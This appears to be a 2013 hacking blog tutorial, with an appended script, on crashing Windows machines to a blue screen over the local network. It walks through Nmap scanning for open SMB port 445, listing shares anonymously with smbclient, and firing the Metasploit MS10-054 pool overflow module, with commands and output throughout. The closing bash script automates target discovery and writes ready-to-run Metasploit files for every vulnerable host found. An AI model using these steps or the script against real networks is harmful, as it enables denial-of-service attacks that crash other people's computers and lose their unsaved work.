May 30, 2013

How To Launch BSOD Attack to Windows

Hey guys... miss me? I mean, do you miss the penetration testing tutorials? It has been a long time since I posted about penetration testing, because I decided to learn a programming language. Anyway, in this post I'll show you how to make a Windows machine hit a BSOD, aka the Blue Screen of Death.

FAQ:

Q: What the fuck is that?
A: The Blue Screen of Death (BSOD), officially a STOP error and also known as Deadscreen, Blue Screen Error, Bluescreen or bug check, is the error screen that the Microsoft Windows family of operating systems displays when it hits a critical, non-recoverable error: the kernel halts the whole system rather than continue in an inconsistent state. The term is named after the colour of the screen the error produces.

Here are some BSOD screenshots I found on the Internet:

[image: BSOD on Windows 8]

[image: BSOD on previous Windows versions]

Requirements:

Conditions
  1. You are on the same LAN as your target.
  2. You know your target's IP address.
  3. Your target's firewall is off, or at least does not block TCP port 445 (SMB).
  4. Your target shares a folder on the LAN, and that share can be read anonymously (a null session) or with credentials you have. The administrative shares (C$, ADMIN$ and so on) do not count: a null session cannot open them.
  5. You know the name of that shared folder.
  6. Your target has not installed the MS10-054 update (August 2010). The Metasploit module used below sends a malformed SMB request that overflows a kernel pool in srv.sys, the kernel SMB server driver, on unpatched systems; a patched machine is not affected.
  7. You have a working brain.

Tools
  1. A network mapper (I use Nmap for the information gathering phase)
  2. The Metasploit Framework (msfconsole)

How To:
1. Find out your own IP address

You can find your IP address with the following command:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] ifconfig wlan0

which gives this output:

Output :
wlan0     Link encap:Ethernet  HWaddr e0:b9:a5:9d:37:e9
          inet addr:192.168.1.105  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::e2b9:a5ff:fe9d:37e9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:190272 errors:0 dropped:0 overruns:0 frame:0
          TX packets:124610 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:243524173 (232.2 MiB)  TX bytes:14349659 (13.6 MiB)

The number after "inet addr:" is your IP address (192.168.1.105 here). "Mask:" tells you how big the LAN you share with the target is; 255.255.255.0 means the last octet is the only part that varies.

NOTE: wlan0 is the usual name of the wireless interface on Linux. Adjust it to your own interface; a wired interface is usually eth0, etc.

In this tutorial I'm testing inside VMware, so the method is tried against a VM of my own and harms nobody. The interface facing the VM network is vmnet8:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] ifconfig vmnet8

Output :
vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08
          inet addr:192.168.222.1  Bcast:192.168.222.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fec0:8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84 errors:0 dropped:0 overruns:0 frame:0
          TX packets:72 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

So my IP address is 192.168.222.1.

2. Find out your target's IP address

In this section you may use any tool that gives you network assessment ability. I'm using Nmap, which is faster (it runs from the console) and more reliable.

Back to the requirements: we need to know whether our target is behind a firewall, and whether it shares a folder. Both come down to one observation:

A Windows machine that is not firewalled answers ping, and if File and Printer Sharing is turned on it listens on TCP port 445 (the SMB service).

So let's check who has port 445 open with the following command:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] nmap 192.168.222.1-255 -p 445

Still remember my IP address? Yes, that's why I typed 192.168.222.1 in the Nmap command. And the -255? It turns the last octet into a range, so Nmap scans from 192.168.222.1 to 192.168.222.255: every address on that LAN (192.168.222.0/24 would mean the same thing).

And -p 445? That is the port. I only probe port 445 on each IP, which is much faster than Nmap's default 1000-port scan, and the result directly tells me which hosts have SMB reachable. Note that Nmap pings a host before scanning it; if a target blocks ping but not port 445, add -Pn so Nmap skips host discovery and probes every address anyway.

Adjust the range to your own IP address. For example, if your IP address is 10.20.0.33, type:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] nmap 10.20.0.1-255 -p 445

Replace the last number of your own address with 1-255, so the scan also covers the addresses below yours (10.20.0.1 to 10.20.0.32), not only those above it.

After scanning my network, here is the output:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] nmap 192.168.222.1-255 -p 445

Output :
Starting Nmap 6.00 ( http://nmap.org ) at 2013-05-30 20:09 WIT
Nmap scan report for 192.168.222.1
Host is up (0.0014s latency).
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 192.168.222.128
Host is up (0.0021s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 255 IP addresses (2 hosts up) scanned in 45.20 seconds

So we have 192.168.222.128 with port 445 open (192.168.222.1 is my own machine, which is why 445 shows as closed there).

3. Find out whether the target shares a folder

You may wonder why our target must share a folder before we can BSOD his or her PC or laptop. Well, the method I use here is a DoS: the Metasploit module below first connects to a share, then sends a malformed SMB Trans2 QUERY_FS_INFORMATION request (the MS10-054 bug) that overflows a kernel pool in the SMB server driver and takes the whole system down. Without a share it can connect to, the module never reaches the vulnerable code. So how do we know whether the target shares a folder? With this simple command:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] smbclient -L //TARGET_IP -N

-L lists the shares of a server and -N means "no password", i.e. try a null session. Write the server as //IP (or just the IP). If you type \\IP in a shell, the shell mangles the backslashes before smbclient sees them.

In this case, my target's IP is 192.168.222.128, so my command looks like this:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] smbclient -L //192.168.222.128 -N

And it gives an output like this:

Output :
Domain=[MICROSOFT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

        Sharename       Type      Comment
        ---------       ----      -------
        Secret Stuff    Disk
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
session request to 192.168.222.128 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[MICROSOFT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------

We need a share name from this output. OS=[Windows 5.1] also tells us the target is Windows XP, one of the systems MS10-054 covers. We can use any share we are allowed to read; the ones ending in $ (C$, E$, ADMIN$) are administrative shares that a null session cannot open, so I use Secret Stuff. The "session request ... failed" lines come from the NetBIOS name lookup smbclient tries afterwards for the browse list; the share list itself came back fine, so they can be ignored.

4. Launch the BSOD attack

Start the Metasploit console with the following command:

Command :
┌─[omega@kali] - [~] - [2013-05-30 07:37:36]
└─[] msfconsole

Output :
       =[ metasploit v4.6.1-2013052201 [core:4.6 api:1.0]
+ -- --=[ 1109 exploits - 699 auxiliary - 179 post
+ -- --=[ 298 payloads - 29 encoders - 8 nops

Then select the module and set your options:

Command :
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf auxiliary(ms10_054_queryfs_pool_overflow) > set RHOST 192.168.222.128
RHOST => 192.168.222.128
msf auxiliary(ms10_054_queryfs_pool_overflow) > set SMBSHARE "Secret Stuff"
SMBSHARE => Secret Stuff

RHOST is your target's IP and SMBSHARE is the folder he or she shares (quote it when the name contains spaces). The module connects with a null session by default; if the share refuses anonymous access, also set SMBUser and SMBPass to an account that can read it, as with the other Metasploit SMB modules. All done, let's kick some ass!

Command :
msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed
msf auxiliary(ms10_054_queryfs_pool_overflow) >

One caveat: the module cannot see the crash, so it prints "The target should encounter a blue screen error now" whether or not the target was actually vulnerable. Check the target's screen, or re-run the Nmap scan from step 2: a host that really went down stops answering on port 445 until it reboots, while a patched host keeps serving the share as if nothing happened.

And... ... ...

OWNED!!!
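Steps 2 to 4 are one procedure, so here it is as a script (an added example, not code from the original post): it parses Nmap's grepable output for hosts with 445 open, parses the smbclient share list for a non-administrative Disk share, and writes a Metasploit resource file equivalent to the interactive session above instead of firing the module itself. The script name bsod_recon.sh and the 192.168.222.0/24 range are assumptions; the sample Nmap and smbclient output inside demo() is constructed in the layout those tools print, so the demo runs without a target. Live mode needs nmap, smbclient and msfconsole on the PATH.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): steps 2-4 of the tutorial as one
# script. Live mode:  ./bsod_recon.sh 192.168.222.0/24   (name/range assumed)
# Demo mode (no args) runs the parsers on constructed sample output.
set -eu

# Read `nmap -oG -` (grepable) output on stdin; print hosts with 445/tcp open.
hosts_with_445_open() {
  awk '/^Host:/ && /445\/open\/tcp/ { print $2 }'
}

# Read `smbclient -L` output on stdin; print Disk shares whose name does not
# end in "$" (C$, ADMIN$, E$ need administrator credentials, which a null
# session does not have). Share names may contain spaces, so the name is
# every field before the first "Disk" field.
disk_shares() {
  awk '{
    for (i = 2; i <= NF; i++) if ($i == "Disk") break
    if (i > NF) next
    name = $1
    for (j = 2; j < i; j++) name = name " " $j
    if (name !~ /\$$/) print name
  }'
}

# Print a Metasploit resource script with the same commands the post types
# interactively. Run it with:  msfconsole -q -r ms10_054_<ip>.rc
msf_rc() {
  printf 'use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow\n'
  printf 'set RHOST %s\n' "$1"
  printf 'set SMBSHARE "%s"\n' "$2"
  printf 'run\n'
}

# Live mode: scan the range, list anonymously readable disk shares per host,
# and write one .rc file per target. Nothing is fired; review the files first.
scan_and_prepare() {
  nmap -n -p 445 --open -oG - "$1" | hosts_with_445_open | while read -r ip; do
    smbclient -L "//$ip" -N 2>/dev/null | disk_shares | head -n 1 |
      while read -r share; do
        msf_rc "$ip" "$share" > "ms10_054_$ip.rc"
        echo "wrote ms10_054_$ip.rc (share: $share)"
      done
  done
}

# Demo mode: constructed samples in the layout nmap -oG and smbclient -L print.
demo() {
  sample_nmap='Host: 192.168.222.1 ()   Ports: 445/closed/tcp//microsoft-ds///
Host: 192.168.222.128 ()   Ports: 445/open/tcp//microsoft-ds///'
  sample_smb='        Sharename       Type      Comment
        ---------       ----      -------
        Secret Stuff    Disk
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share'
  ip=$(printf '%s\n' "$sample_nmap" | hosts_with_445_open)
  share=$(printf '%s\n' "$sample_smb" | disk_shares | head -n 1)
  msf_rc "$ip" "$share"
}

if [ "$#" -gt 0 ]; then scan_and_prepare "$1"; else demo; fi
```

Run without arguments it prints the four-line resource script for 192.168.222.128 and "Secret Stuff", exactly what the msfconsole session above typed by hand. Keeping the parsers separate from the live pipeline is deliberate: the share list is the only input the module really depends on, and filtering out the $ shares avoids a run that fails at the tree connect before the malformed request is ever sent.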
